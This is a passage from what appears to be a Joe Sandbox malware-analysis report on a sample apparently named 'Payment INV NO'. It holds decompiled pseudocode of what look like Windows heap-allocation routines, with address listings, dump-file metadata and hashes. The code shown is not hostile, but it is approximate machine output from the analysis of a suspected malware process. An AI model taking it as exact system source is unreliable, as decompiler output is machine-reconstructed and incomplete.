					_t330 = (_t203 + 0x0000001f >> 0x00000003 & 0x1ffffffc) + 0x00000020 & 0xfffffff8;
					_t205 = _a4 + _t330;
					_v44 = _t330;
					_t333 =  *0x188874c; // 0x954c531b
					_v32 = _t333;
					if(_t290 + _t205 <= _a12 + _a4) {
						_t376 = _a8 + 8;
						_v36 = _t376 << 0xd;
						_t367 = _t205 - _a4 << 0xd;
						do {
							_t283 = _v8;
							_t319 = _t205 >> 0x00000003 ^  *(_v24 + 0xc) ^ _t367;
							_t367 = _t367 + _v36;
							 *_t205 = _t319 ^ _t333;
							_t280 = _t283 + 1;
							_v8 = _t280;
							 *(_t205 + 4) = (_t283 & 0x0000ffff) << 0x00000008 |  *(_t205 + 4) & 0xff0000ff;
							 *((char*)(_t205 + 7)) = 0x80;
							_t205 = _t205 + _t376;
							_t323 = _t376 + _t205;
							_t376 = _v40;
							_t333 = _v32;
						} while (_t323 <= _a4 + _a12);
						_t358 = _v24;
					}
					_t206 = _a4;
					 *(_t206 + 0x14) = _t280;
					 *((intOrPtr*)(_t206 + 0x18)) = _t206 + 0x1c;
					_t51 = _t280 + 7; // 0x7
					E017DFA60(_t206 + 0x1c, 0, _t51 >> 3);
					_t294 = _t280 & 0x0000001f;
					if(_t294 != 0) {
						 *(_a4 + (_t280 >> 5) * 4 + 0x1c) =  *(_a4 + (_t280 >> 5) * 4 + 0x1c) |  !((1 << _t294) - 1);
					}
					_t334 = _v16;
					_t295 = _a4;
					 *((short*)(_t334 + 0x14)) = _v28;
					 *_t334 = _v12;
					 *(_t334 + 0x18) = _t280;
					 *((char*)(_t334 + 0x1a)) =  *((intOrPtr*)(_a16 + 2));
					 *((short*)(_t334 + 0x16)) = 0;
					 *(_t334 + 4) = _t295;
					 *((intOrPtr*)(_t334 + 8)) = 0;
					 *((intOrPtr*)(_t334 + 0xc)) = 0;
					_t335 = _v12;
					_v26 = _v28 << 3;
					_v28 = _v44;
					 *(_t295 + 0x10) = _v32 ^ _v28 ^ _t358 ^ _t295;
					if( *((intOrPtr*)(_t335 + 0x54)) == 0) {
						_t296 =  *_t335;
						_t223 =  *(_t296 + 0x14);
						__eflags = _t223 - 0x20;
						if(__eflags < 0) {
							_t224 = _t223 + 4;
							__eflags = _t224;
							goto L32;
						}
						goto L29;
					} else {
						 *((short*)(_t335 + 0x60)) =  *((short*)(_t335 + 0x60)) + 1;
						if( *((short*)(_t335 + 0x60)) > 0x1c) {
							_t296 =  *_t335;
							_t271 =  *(_t296 + 0x14);
							__eflags = _t271;
							if(__eflags != 0) {
								_t224 = _t271 + 0xfffffffc;
								L32:
								 *(_t296 + 0x14) = _t224;
							}
							L29:
							 *((short*)(_t335 + 0x60)) = 0;
						}
					}
					_t369 = _t335 + 0x50;
					do {
						_t226 =  *_t369;
						_t359 =  *((intOrPtr*)(_t369 + 4));
						_v40 = _t226;
						_v44 = _t226 + _t280;
						if(_t280 <= 0) {
						}
						_t336 = _t359;
						asm("lock cmpxchg8b [esi]");
						_t280 = _v8;
					} while (_t226 != _v40 || _t336 != _t359);
					_t299 = _v12;
					_t337 =  *[fs:0x18];
					_t227 =  *_t299;
					 *((intOrPtr*)(_t227 + 0x10)) =  *((intOrPtr*)(_t227 + 0x10)) + 1;
					 *((intOrPtr*)(_t299 + 0x58)) =  *((intOrPtr*)(_t227 + 0x10));
					_t229 =  *(_t337 + 0xfaa) & 0x0000ffff;
					_t300 = _t229 + 0x00000001 & 0x000000ff;
					 *(_t337 + 0xfaa) = _t300 + 0x00000001 & 0x000000ff;
					_t302 = _t280;
					_v32 = ( *(_t229 + 0x1886120) & 0x000000ff | ( *(_t300 + 0x1886120) & 0x000000ff) << 0x00000007 & 0x0000ffff) % _t302 << 0x10;
					_t341 = _v16;
					_v32 = _t302;
					_t303 = _v32;
					 *((intOrPtr*)(_v16 + 0x1c)) = 1;
					asm("lock cmpxchg [esi], ecx");
					if(( *0x18884b4 & 0x00000002) == 0) {
						_t394 =  *0x18884b8;
						_t371 =  *( *[fs:0x18] + 0xfaa) & 0xff;
						_v32 = _t371;
						if( *0x18884b8 == 0) {
							_push(0);
							_push(4);
							_push(0x18884b8);
							_push(0x24);
							_push(0xffffffff);
							__eflags = E017D9670();
							if(__eflags < 0) {
								_t363 =  *0x7ffe0004;
								_v44 = _t363;
								__eflags = _t363 - 0x1000000;
								if(__eflags < 0) {
									_t280 = 0x7ffe0324;
									while(1) {
										_t311 =  *_t280;
										_t346 =  *0x7ffe0320;
										__eflags = _t311 -  *0x7ffe0328;
										if(_t311 ==  *0x7ffe0328) {
											break;
										}
										asm("pause");
									}
									_t371 = _v32;
									_t264 = _t346;
									_t347 = _t264 * _v44 >> 0x20;
									_t303 = (_t311 << 8) * _v44;
									_t341 = _t347 >> 0x18;
									_t267 = ((_t347 << 0x00000020 | _t264 * _v44) >> 0x18) + (_t311 << 8) * _v44;
									__eflags = _t267;
								} else {
									_t348 =  *0x7ffe0320 * _t363 >> 0x20;
									_t267 = (_t348 << 0x00000020 | 0x7ffe0320 * _t363) >> 0x18;
									_t341 = _t348 >> 0x18;
								}
								 *0x18884b8 = _t267;
							}
						}
						_t251 = E017C5720(_t303, _t341, _t394, 0x18884b8);
						_t395 =  *0x18884b8;
						_t361 = _t251;
						_v40 = _t361;
						if( *0x18884b8 == 0) {
							_push(0);
							_push(4);
							_push(0x18884b8);
							_push(0x24);
							_push(0xffffffff);
							__eflags = E017D9670();
							if(__eflags < 0) {
								_t280 =  *0x7ffe0004;
								_v44 = _t280;
								__eflags = _t280 - 0x1000000;
								if(__eflags < 0) {
									_t280 = 0x7ffe0320;
									while(1) {
										_t309 =  *0x7ffe0324;
										_t343 =  *_t280;
										__eflags = _t309 -  *0x7ffe0328;
										if(_t309 ==  *0x7ffe0328) {
											break;
										}
										asm("pause");
									}
									_t371 = _v32;
									_t256 = _t343;
									_t344 = _t256 * _v44 >> 0x20;
									_t361 = _v40;
									_t303 = (_t309 << 8) * _v44;
									_t341 = _t344 >> 0x18;
									_t259 = ((_t344 << 0x00000020 | _t256 * _v44) >> 0x18) + (_t309 << 8) * _v44;
									__eflags = _t259;
								} else {
									_t345 =  *0x7ffe0320 * _t280 >> 0x20;
									_t259 = (_t345 << 0x00000020 | 0x7ffe0320 * _t280) >> 0x18;
									_t341 = _t345 >> 0x18;
								}
								 *0x18884b8 = _t259;
							}
							L58:
						}
						_t253 = E017C5720(_t303, _t341, _t395, 0x18884b8);
						_t341 = _v16;
						_t372 = _t371 >> 3;
						 *(0x1886120 + _t372 * 8) = _t253 & 0x7f7f7f7f;
						 *(0x1886124 + _t372 * 8) = _t361 & 0x7f7f7f7f;
					}
					_t240 =  *( *[fs:0x30] + 0x50);
					if(_t240 != 0) {
						__eflags =  *_t240;
						if( *_t240 == 0) {
							goto L24;
						} else {
							_t197 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
							goto L25;
						}
						goto L58;
					} else {
						L24:
						_t197 = 0x7ffe0380;
					}
					L25:
					if( *_t197 != 0) {
						_t197 =  *[fs:0x30];
						__eflags =  *(_t197 + 0x240) & 0x00000001;
						if(( *(_t197 + 0x240) & 0x00000001) != 0) {
							return L01851A5F(_t280,  *(_v24 + 0xc),  *((intOrPtr*)(_t341 + 4)),  *(_t341 + 0x14) & 0x0000ffff,  *(_t341 + 0x18) & 0x0000ffff,  *(_t341 + 0x1b) & 0x000000ff);
						}
					}
				}
				return _t197;
				goto L58;
			}








































































                                                          0x017c65a0
                                                          0x017c65a9
                                                          0x017c65b1
                                                          0x017c65b5
                                                          0x017c65b7
                                                          0x017c65bb
                                                          0x017c65be
                                                          0x017c65c1
                                                          0x017c65c6
                                                          0x017c68b5
                                                          0x017c65cc
                                                          0x017c65d3
                                                          0x017c65d3
                                                          0x017c65db
                                                          0x017c65dd
                                                          0x01807d05
                                                          0x01807d13
                                                          0x01807d18
                                                          0x01807d1a
                                                          0x01807d20
                                                          0x00000000
                                                          0x01807d20
                                                          0x017c65e3
                                                          0x017c65e3
                                                          0x017c65e6
                                                          0x017c65e9
                                                          0x017c65ee
                                                          0x017c65f7
                                                          0x017c65fd
                                                          0x017c65ff
                                                          0x017c6605
                                                          0x017c6889
                                                          0x017c660b
                                                          0x017c660d
                                                          0x017c660d
                                                          0x017c6612
                                                          0x017c6620
                                                          0x017c6626
                                                          0x017c6629
                                                          0x017c662b
                                                          0x017c6638
                                                          0x017c663e
                                                          0x017c6641
                                                          0x017c664b
                                                          0x017c6653
                                                          0x017c6656
                                                          0x017c6660
                                                          0x017c666b
                                                          0x017c666e
                                                          0x017c6670
                                                          0x017c6675
                                                          0x017c6686
                                                          0x017c6689
                                                          0x017c668c
                                                          0x017c6695
                                                          0x017c6699
                                                          0x017c669b
                                                          0x017c669e
                                                          0x017c66a3
                                                          0x017c66a3
                                                          0x017c66a8
                                                          0x017c66a8
                                                          0x017c66ab
                                                          0x017c66b1
                                                          0x017c66b4
                                                          0x017c66b7
                                                          0x017c66c1
                                                          0x017c66cb
                                                          0x017c66ce
                                                          0x017c66e5
                                                          0x017c66e5
                                                          0x017c66e8
                                                          0x017c66ee
                                                          0x017c66f1
                                                          0x017c66f8
                                                          0x017c66fd
                                                          0x017c6704
                                                          0x017c6709
                                                          0x017c670d
                                                          0x017c6710
                                                          0x017c6713
                                                          0x017c6719
                                                          0x017c671f
                                                          0x017c6726
                                                          0x017c6734
                                                          0x017c673c
                                                          0x017c6891
                                                          0x017c6893
                                                          0x017c6896
                                                          0x017c6899
                                                          0x017c68bd
                                                          0x017c68bd
                                                          0x00000000
                                                          0x017c68bd
                                                          0x00000000
                                                          0x017c6742
                                                          0x017c6742
                                                          0x017c674b
                                                          0x017c68c5
                                                          0x017c68c7
                                                          0x017c68ca
                                                          0x017c68cc
                                                          0x017c68ce
                                                          0x017c68c0
                                                          0x017c68c0
                                                          0x017c68c0
                                                          0x017c689b
                                                          0x017c689d
                                                          0x017c689d
                                                          0x017c674b
                                                          0x017c6751
                                                          0x017c6754
                                                          0x017c6754
                                                          0x017c6756
                                                          0x017c6759
                                                          0x017c675f
                                                          0x017c6764
                                                          0x017c6764
                                                          0x017c676d
                                                          0x017c6772
                                                          0x017c6776
                                                          0x017c6779
                                                          0x017c6782
                                                          0x017c6785
                                                          0x017c678c
                                                          0x017c678e
                                                          0x017c6794
                                                          0x017c6797
                                                          0x017c67a1
                                                          0x017c67aa
                                                          0x017c67ca
                                                          0x017c67d4
                                                          0x017c67d7
                                                          0x017c67da
                                                          0x017c67de
                                                          0x017c67e1
                                                          0x017c67eb
                                                          0x017c67f6
                                                          0x017c67fe
                                                          0x017c680c
                                                          0x017c680f
                                                          0x017c6812
                                                          0x01807d30
                                                          0x01807d32
                                                          0x01807d34
                                                          0x01807d39
                                                          0x01807d3b
                                                          0x01807d42
                                                          0x01807d44
                                                          0x01807d4a
                                                          0x01807d50
                                                          0x01807d53
                                                          0x01807d59
                                                          0x01807d6d
                                                          0x01807d7c
                                                          0x01807d7c
                                                          0x01807d7e
                                                          0x01807d82
                                                          0x01807d84
                                                          0x00000000
                                                          0x00000000
                                                          0x01807d86
                                                          0x01807d86
                                                          0x01807d8a
                                                          0x01807d8d
                                                          0x01807d8f
                                                          0x01807d95
                                                          0x01807d9d
                                                          0x01807da0
                                                          0x01807da0
                                                          0x01807d5b
                                                          0x01807d62
                                                          0x01807d64
                                                          0x01807d68
                                                          0x01807d68
                                                          0x01807da2
                                                          0x01807da2
                                                          0x01807d44
                                                          0x017c681d
                                                          0x017c6822
                                                          0x017c6829
                                                          0x017c682b
                                                          0x017c682e
                                                          0x01807dac
                                                          0x01807dae
                                                          0x01807db0
                                                          0x01807db5
                                                          0x01807db7
                                                          0x01807dbe
                                                          0x01807dc0
                                                          0x01807dc6
                                                          0x01807dcc
                                                          0x01807dcf
                                                          0x01807dd5
                                                          0x01807dee
                                                          0x01807df8
                                                          0x01807df8
                                                          0x01807dfa
                                                          0x01807dfe
                                                          0x01807e00
                                                          0x00000000
                                                          0x00000000
                                                          0x01807e02
                                                          0x01807e02
                                                          0x01807e06
                                                          0x01807e09
                                                          0x01807e0b
                                                          0x01807e0e
                                                          0x01807e14
                                                          0x01807e1c
                                                          0x01807e1f
                                                          0x01807e1f
                                                          0x01807dd7
                                                          0x01807dde
                                                          0x01807de0
                                                          0x01807de4
                                                          0x01807de4
                                                          0x01807e21
                                                          0x01807e21
                                                          0x00000000
                                                          0x01807dc0
                                                          0x017c6839
                                                          0x017c683e
                                                          0x017c6850
                                                          0x017c6853
                                                          0x017c685a
                                                          0x017c685a
                                                          0x017c6867
                                                          0x017c686c
                                                          0x01807e2b
                                                          0x01807e2e
                                                          0x00000000
                                                          0x01807e34
                                                          0x01807e3d
                                                          0x00000000
                                                          0x01807e3d
                                                          0x00000000
                                                          0x017c6872
                                                          0x017c6872
                                                          0x017c6872
                                                          0x017c6872
                                                          0x017c6877
                                                          0x017c687a
                                                          0x01807e47
                                                          0x01807e4d
                                                          0x01807e54
                                                          0x00000000
                                                          0x01807e75
                                                          0x01807e54
                                                          0x017c687a
                                                          0x017c6886
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f129bc76ce150c94329b54e17180a65b5de756837c39340e51b6106101233fea
                                                          • Instruction ID: 7dcb189454b6a32cdd8eecd575578359cc79068c7ae7a4bc435953249802d360
                                                          • Opcode Fuzzy Hash: f129bc76ce150c94329b54e17180a65b5de756837c39340e51b6106101233fea
                                                          • Instruction Fuzzy Hash: EDE16D75A002098FDB18CF59C880AAAFBF1FF48710F54816DE955EB395D734EA81CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B4670 Relevance: .4, Instructions: 367COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E017B4670(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				char _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				signed int _v44;
				unsigned int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t173;
				void* _t174;
				signed int _t175;
				intOrPtr _t176;
				signed int _t179;
				intOrPtr _t182;
				signed int* _t184;
				signed int* _t185;
				signed int _t186;
				signed int _t187;
				signed char _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed char _t192;
				signed int _t193;
				signed int _t204;
				signed int _t206;
				signed char _t207;
				intOrPtr* _t208;
				signed int _t211;
				signed int _t212;
				signed int* _t214;
				signed int _t216;
				signed int* _t217;
				signed char _t222;
				signed int _t224;
				signed int _t226;
				void* _t228;
				signed int _t229;
				signed int _t236;
				intOrPtr _t237;
				signed int _t238;
				signed char _t240;
				unsigned int _t242;
				signed char _t246;
				signed int _t247;
				signed char _t248;
				signed int _t249;
				unsigned int _t251;
				signed int _t252;
				signed int _t258;
				signed int _t263;
				signed int _t265;
				signed int _t268;
				signed int _t270;
				signed int _t271;
				char _t274;
				signed int _t276;
				signed char _t281;
				signed int _t287;
				unsigned int _t290;
				signed int _t293;
				signed int _t296;
				void* _t302;
				void* _t314;

				_t229 = __ecx;
				_t228 = _t302;
				_v8 =  *((intOrPtr*)(_t228 + 4));
				_t296 = __ecx;
				_t285 = __edx;
				_v28 = __edx;
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t265 = L01842E4E( *(_t228 + 8));
					_t170 =  *(__ecx + 0x28);
					_v48 = _t265;
					__eflags = _t170;
					if(_t170 != 0) {
						_t237 =  *[fs:0x18];
						__eflags = _t170 -  *((intOrPtr*)(_t237 + 0x24));
						if(_t170 ==  *((intOrPtr*)(_t237 + 0x24))) {
							_t265 = _t265 | 0x00000001;
							__eflags = _t265;
							_v48 = _t265;
						}
					}
					__eflags =  *0x1885cb8 & 0x00000002;
					if(( *0x1885cb8 & 0x00000002) != 0) {
						__eflags = 0x7eff8 - _t285;
						asm("sbb eax, eax");
						_t173 = 0x20;
						__eflags = 0x7eff8;
					} else {
						_t173 = 0;
					}
					_v44 = _t173;
					_t174 = _t173 + _t285;
					__eflags = _t174 - _t285;
					if(_t174 >= _t285) {
						_t175 = L0185AA16(_t296, _t174, _t265,  *((intOrPtr*)(_t228 + 0xc)));
						_v20 = _t175;
						__eflags = _t175;
						if(_t175 == 0) {
							goto L42;
						}
						__eflags =  *0x1885cb8 & 0x00000002;
						if(( *0x1885cb8 & 0x00000002) != 0) {
							_t236 = _v44;
							 *((intOrPtr*)(_t175 + _t236 - 8)) = _t236;
							_t268 = _t175 + _t236;
							__eflags = _t236 - 8;
							if(_t236 > 8) {
								 *_t175 = _t236;
							}
							_v20 = _t268;
						}
						_t179 = E017B7D30(_t296);
						_t287 = _v20;
						__eflags = _t179;
						if(_t179 != 0) {
							L018502F7(_t296, _t287);
						}
						goto L16;
					} else {
						_v20 = 0;
						L42:
						_t286 =  *[fs:0x18];
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000017;
						_t176 = E0179CCC0(0xc0000017);
						__eflags = _v48;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t176;
						if(__eflags < 0) {
							L44:
							L0184239A(_t228, _v28, _t286, _t296, __eflags);
							L15:
							_t287 = _v20;
							L16:
							return _t287;
						}
						__eflags =  *(_t296 + 0xc);
						if(__eflags >= 0) {
							goto L15;
						}
						goto L44;
					}
				}
				_t270 =  *(_t228 + 8) |  *(__ecx + 0x44);
				_v48 = 0;
				_v24 = _t270;
				_v36 = 0;
				_v40 = 0;
				if(__edx > 0x7fffffff) {
					_v36 = 5;
					L61:
					_v20 = 0;
					L23:
					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000017;
					_t182 = E0179CCC0(0xc0000017);
					_t271 = _v24;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t182;
					_t285 = _v28;
					__eflags = _t271 & 0x00000004;
					if((_t271 & 0x00000004) == 0) {
						L11:
						_t184 =  *( *[fs:0x30] + 0x50);
						if(_t184 != 0) {
							__eflags =  *_t184;
							if( *_t184 == 0) {
								goto L12;
							}
							_t185 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
							L13:
							if( *_t185 != 0) {
								_t186 =  *[fs:0x30];
								__eflags =  *(_t186 + 0x240) & 0x00000001;
								_t238 = _t229 & 0xffffff00 | ( *(_t186 + 0x240) & 0x00000001) != 0x00000000;
								__eflags =  *(_t296 + 0x44) & 0x01000000;
								_t187 = _t186 & 0xffffff00 | ( *(_t296 + 0x44) & 0x01000000) == 0x00000000;
								__eflags = _t187 & _t238;
								if((_t187 & _t238) == 0) {
									goto L14;
								}
								__eflags = _t271 & 0x61000000;
								_t240 = _t238 & 0xffffff00 | __eflags != 0x00000000;
								asm("bt edx, 0x1c");
								_t192 = _t187 & 0xffffff00 | __eflags >= 0x00000000;
								__eflags = _t192 & _t240;
								if((_t192 & _t240) != 0) {
									goto L14;
								}
								__eflags = _v36 - 5;
								if(_v36 == 5) {
									goto L14;
								}
								_t193 = _v20;
								__eflags = _t193;
								if(_t193 == 0) {
									L80:
									L0185131B(_t296, _t193, _t285, _v36);
									_t271 = _v24;
									goto L14;
								}
								_t274 =  *((intOrPtr*)(_t193 - 1));
								_t242 = _t193 - 8;
								_v13 = _t274;
								__eflags = _t274 - 5;
								_t271 = _v24;
								_v44 = _t242;
								if(_t274 == 5) {
									_t276 = _t242 - (( *(_t242 + 6) & 0x000000ff) << 3);
									__eflags = _t276;
									_t193 = _v20;
									_v48 = _t276;
									_t271 = _v24;
								} else {
									_v48 = _t242;
								}
								_t290 = _v48;
								__eflags =  *((char*)(_t290 + 7));
								_t285 = _v28;
								if( *((char*)(_t290 + 7)) < 0) {
									goto L80;
								} else {
									__eflags = _v13 - 5;
									if(_v13 == 5) {
										_t247 = _t242 - (( *(_t242 + 6) & 0x000000ff) << 3);
										__eflags = _t247;
										_v44 = _t247;
									}
									_t246 =  *(_t296 + 0x4c) >> 0x00000011 &  *(_t296 + 0x52) & 0x000000ff ^  *(_v44 + 2) & 0x000000ff;
									__eflags = _t246 & 0x00000008;
									if((_t246 & 0x00000008) != 0) {
										goto L14;
									} else {
										_t193 = _v20;
										goto L80;
									}
								}
							}
							L14:
							_t188 =  *0x1888664; // 0x0
							if((_t188 & 0x00000001) != 0) {
								__eflags = _t188 & 0x00000002;
								if((_t188 & 0x00000002) == 0) {
									goto L15;
								}
								_t189 =  *[fs:0x30];
								__eflags =  *(_t189 + 0x18);
								if( *(_t189 + 0x18) == 0) {
									goto L15;
								}
								_push( *0x188634c);
								_t190 = L0185BD32( *0x1886348);
								__eflags = _t296 -  *_t190;
								if(_t296 ==  *_t190) {
									goto L15;
								}
								_t287 = _v20;
								__eflags = _t287;
								if(_t287 != 0) {
									__eflags = _t271 & 0x10000000;
									if((_t271 & 0x10000000) == 0) {
										L018502F7(_t296, _t287);
									}
								}
								goto L16;
							}
							goto L15;
						}
						L12:
						_t185 = 0x7ffe0380;
						goto L13;
					}
					_t204 = _v48;
					__eflags = _t204;
					if(__eflags == 0) {
						_t204 = _t285;
					}
					_t229 = _t204;
					L0184239A(_t228, _t229, _t285, _t296, __eflags);
					L10:
					_t271 = _v24;
					goto L11;
				}
				_t206 =  *(__ecx + 0x58);
				_v32 = _t206;
				if(_t206 != 0) {
					__eflags = _t270 & 0x3c000102;
					_t248 = __ecx & 0xffffff00 | __eflags == 0x00000000;
					asm("bt dword [esi+0x44], 0x18");
					_t207 = _t206 & 0xffffff00 | __eflags >= 0x00000000;
					__eflags = _t207 & _t248;
					if((_t207 & _t248) == 0) {
						_v32 = 0;
						goto L3;
					}
					_t229 = _v32;
					_t226 = L0183CB1E(_t229, __ecx, 0, 1,  &_v40);
					__eflags = _t226;
					if(_t226 < 0) {
						goto L61;
					}
					_t270 = _v24;
					_t263 = _v40 + 0x00000007 & 0xfffffff8;
					_t285 = __edx + 8 + _t263;
					_v28 = _t285;
					_t101 = _t263 + 8; // 0x1
					_v40 = _t101;
				}
				L3:
				if(_t285 == 0) {
					_t249 = 1;
				} else {
					_t249 = _t285;
				}
				_t251 = _t249 + 0x0000000f & 0xfffffff8;
				_v48 = _t251;
				_t252 = _t251 >> 3;
				_v44 = _t252;
				if((_t270 & 0x7d810f61) != 0) {
					L29:
					_t208 = 0;
					goto L22;
				} else {
					_t314 = _t285 -  *0x1885cb4; // 0x4000
					if(_t314 > 0) {
						L18:
						_t214 =  *(_t296 + 0xb4);
						_v44 = _t214;
						__eflags = _t252 - _t214[1];
						if(_t252 >= _t214[1]) {
							while(1) {
								_t293 =  *_t214;
								__eflags = _t293;
								_v20 = _t293;
								_t285 = _v28;
								if(_t293 == 0) {
									_t252 = _t214[1] - 1;
									goto L19;
								}
								_t214 = _v20;
								_v44 = _t214;
								__eflags = _t252 - _t214[1];
								if(_t252 < _t214[1]) {
									goto L19;
								} else {
									continue;
								}
							}
						}
						L19:
						_t216 = _t214[1] - 1;
						_v20 = _t216;
						__eflags = _t252 - _t216;
						_t217 = _v44;
						if(_t252 >= _t216) {
							__eflags =  *_t217;
							if( *_t217 != 0) {
								__eflags = _t252 - _v20;
								if(_t252 == _v20) {
									goto L20;
								}
							}
							goto L29;
						}
						L20:
						_t258 = _t252 - _t217[5];
						__eflags = _t217[2];
						if(_t217[2] != 0) {
							_t258 = _t258 + _t258;
						}
						_t208 = _t217[8] + _t258 * 4;
						L22:
						_t229 = _t296;
						_t278 = E017B5600(_t229, _t270 | 0x00000002, _t285, _v48, _t208,  &_v36);
						_v20 = _t278;
						__eflags = _t278;
						if(_t278 != 0) {
							L9:
							if(_v32 != 0) {
								_v28 = _v28 - _v40;
								_t211 = L01841EB6(_t296, _v24, _t278, _v28 - _v40, _v40, _v32);
								_t229 = _v32;
								_v20 = _t211;
								_t212 = L0183CB1E(_t229, _t296, _t211, 2, _t278);
								__eflags = _t212;
								if(_t212 >= 0) {
									_t285 = _v28;
									goto L10;
								}
								E017B77F0(_t296, 0, _v20);
								goto L61;
							}
							goto L10;
						}
						goto L23;
					}
					_t281 =  *((intOrPtr*)((_t252 >> 3) + _t296 + 0xe2));
					_t222 = 1 << (_t252 & 7);
					_t252 = _v44;
					if((_t281 & _t222) == 0) {
						L17:
						_t270 = _v24;
						goto L18;
					}
					_v36 = 2;
					_t229 =  *(_t296 + 0xd4);
					_t224 = E017B4880(_t229,  *((intOrPtr*)( *((intOrPtr*)(_t296 + 0xdc)) + _t252 * 2)), _t285, _v24);
					_t278 = _t224;
					_v20 = _t224;
					if(_t224 == 0) {
						_t252 = _v44;
						goto L17;
					}
					goto L9;
				}
			}








































































                                                          0x017b4670
                                                          0x017b4673
                                                          0x017b4682
                                                          0x017b468c
                                                          0x017b468f
                                                          0x017b4691
                                                          0x017b469b
                                                          0x017fe2f1
                                                          0x017fe2f3
                                                          0x017fe2f6
                                                          0x017fe2f9
                                                          0x017fe2fb
                                                          0x017fe2fd
                                                          0x017fe304
                                                          0x017fe307
                                                          0x017fe309
                                                          0x017fe309
                                                          0x017fe30c
                                                          0x017fe30c
                                                          0x017fe307
                                                          0x017fe30f
                                                          0x017fe316
                                                          0x017fe321
                                                          0x017fe323
                                                          0x017fe328
                                                          0x017fe328
                                                          0x017fe318
                                                          0x017fe318
                                                          0x017fe318
                                                          0x017fe32b
                                                          0x017fe32e
                                                          0x017fe330
                                                          0x017fe332
                                                          0x017fe385
                                                          0x017fe38a
                                                          0x017fe38d
                                                          0x017fe38f
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe391
                                                          0x017fe398
                                                          0x017fe39a
                                                          0x017fe39d
                                                          0x017fe3a1
                                                          0x017fe3a4
                                                          0x017fe3a7
                                                          0x017fe3a9
                                                          0x017fe3a9
                                                          0x017fe3ab
                                                          0x017fe3ab
                                                          0x017fe3b0
                                                          0x017fe3b5
                                                          0x017fe3b8
                                                          0x017fe3ba
                                                          0x017fe3c4
                                                          0x017fe3c4
                                                          0x00000000
                                                          0x017fe334
                                                          0x017fe334
                                                          0x017fe33b
                                                          0x017fe342
                                                          0x017fe34e
                                                          0x017fe358
                                                          0x017fe35d
                                                          0x017fe361
                                                          0x017fe364
                                                          0x017fe370
                                                          0x017fe373
                                                          0x017b4790
                                                          0x017b4790
                                                          0x017b4793
                                                          0x017b479d
                                                          0x017b479d
                                                          0x017fe366
